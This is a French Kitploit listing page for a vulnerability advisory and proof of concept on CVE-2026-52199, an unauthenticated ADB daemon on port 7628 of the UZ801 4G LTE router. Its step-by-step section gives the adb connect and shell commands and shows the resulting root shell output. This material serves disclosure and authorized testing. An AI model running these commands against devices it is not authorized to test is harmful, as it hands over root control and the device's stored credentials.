Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-52199 — Exploit de preuve de concept pour CVE-2026-52199 : exécution de code à distance non authentifiée via le démon ADB exposé sur le routeur 4G LTE UZ801. Comprend l'analyse de la vulnérabilité, l'évaluation de l'impact et un guide d'exploitation étape par étape pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/lamaper/cve-2026-52199
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceLabs et Pratique
GitHublamaper/cve-2026-52199

CVE-2026-52199

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit de preuve de concept pour CVE-2026-52199 : exécution de code à distance non authentifiée via le démon ADB exposé sur le routeur 4G LTE UZ801. Comprend l'analyse de la vulnérabilité, l'évaluation de l'impact et un guide d'exploitation étape par étape pour les tests de sécurité autorisés.

Partager

CVE-2026-52199 : Exécution de code à distance non authentifiée dans le routeur 4G UZ801

Résumé de la vulnérabilité

Une vulnérabilité critique de contrôle d'accès incorrect existe dans le routeur 4G LTE UZ801_v2.1 OEM générique (firmware V3.4.3). L'appareil expose de manière inappropriée un démon Android Debug Bridge (ADB) non authentifié (/sbin/adbd) sur le port TCP 7628 au réseau adjacent (LAN/WiFi).

hardware_pcb

Un attaquant connecté au réseau local de l'appareil peut exploiter cette faille pour contourner tous les mécanismes d'authentification, établir une connexion ADB et exécuter du code arbitraire avec les privilèges root.

evidence

Produit affecté

  • Fournisseur : Écosystème OEM générique / marque blanche
  • Produit : UZ801_v2.1 4G LTE Router
  • Version : V3.4.3
  • Composant vulnérable : /sbin/adbd

Impact

L'exploitation de cette vulnérabilité conduit à un compromis complet du système. L'impact inclut :

  • Exécution de code à distance (RCE) : True
  • Élévation de privilèges : True (Obtention directe d'un shell root)
  • Divulgation d'informations : True (Accès complet au système de fichiers interne et aux identifiants)
  • Déni de service (DoS) : True (Capacité de bricker ou de manipuler l'appareil)

Preuve de concept (PoC)

Le processus d'exploitation ne nécessite aucun outil spécial autre que le client adb standard et un accès au réseau adjacent.

Étape 1 : Connectez-vous au réseau WiFi du routeur UZ801 (la passerelle par défaut est généralement 192.168.100.1).

Étape 2 : Scannez l'appareil à la recherche de ports ouverts. Le port 7628/TCP sera signalé comme ouvert.

Étape 3 : Depuis la machine de l'attaquant, initiez une connexion ADB vers le port non documenté :

root@kitploit:~
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628

Étape 4 : Demandez un shell interactif :

root@kitploit:~
$ adb -s 192.168.100.1:7628 shell

Étape 5 : L'attaquant obtient immédiatement un shell root sans aucune invite d'authentification :

root@kitploit:~
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64

Avertissement

Uniquement à des fins éducatives et de recherche en sécurité autorisée. Les informations et la preuve de concept fournies dans ce dépôt sont destinées uniquement à des fins éducatives et à aider à sécuriser les réseaux. L'auteur (lamaper) n'est pas responsable de toute utilisation abusive de ces informations. N'utilisez pas cet exploit contre des appareils ou des réseaux que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.

Télécharger l’outil